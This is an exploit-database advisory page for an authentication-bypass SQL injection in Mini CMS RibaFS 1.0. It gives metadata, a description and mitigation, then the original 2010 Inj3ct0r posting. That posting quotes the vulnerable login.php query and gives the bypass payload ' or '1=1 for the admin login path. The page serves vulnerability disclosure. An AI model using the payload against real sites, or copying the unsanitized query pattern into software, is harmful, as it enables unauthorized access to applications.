Mini CMS RibaFS 1.0 (Auth Bypass) SQL Injection Vulnerability

vendor:

Mini CMS RibaFS

by:

cr4wl3r

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: Mini CMS RibaFS

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:minicmsribafs:minicmsribafs:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Mini CMS RibaFS 1.0 (Auth Bypass) SQL Injection Vulnerability

Mini CMS RibaFS 1.0 is vulnerable to an authentication bypass vulnerability due to insufficient sanitization of user-supplied input. An attacker can exploit this vulnerability to bypass authentication and gain access to the application. The vulnerability exists in the login.php file, where the application does not properly sanitize user-supplied input before using it in an SQL query. This can be exploited to inject arbitrary SQL code and bypass authentication.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner.

Source

Exploit-DB raw data:

=============================================================
Mini CMS RibaFS 1.0 (Auth Bypass) SQL Injection Vulnerability
=============================================================


[+] Mini CMS RibaFS 1.0 (Auth Bypass) SQL Injection Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered by: cr4wl3r
[+] My id: http://inj3ct0r.com/author/945
[+] Original: http://inj3ct0r.com/exploits/9667
[+] Download : http://code.google.com/p/minicmsribafs/downloads/list

[+] Code [login.php]

if (isset($_POST['login']))
{

 include_once("./../conexao.inc.php");

     $login=$_POST['login'];
     $senha=$_POST['senha'];  

     $senha=md5($senha);
     $sql=" SELECT * FROM usuarios WHERE login ='$login' AND senha = '$senha' ";

     $qry= mysql_query($sql);

[+] PoC: [path]/admin/login.php
    Auth Bypass : ' or '1=1

[+] Greetz: All member inj3ct0r.com


# Inj3ct0r.com [2010-03-22]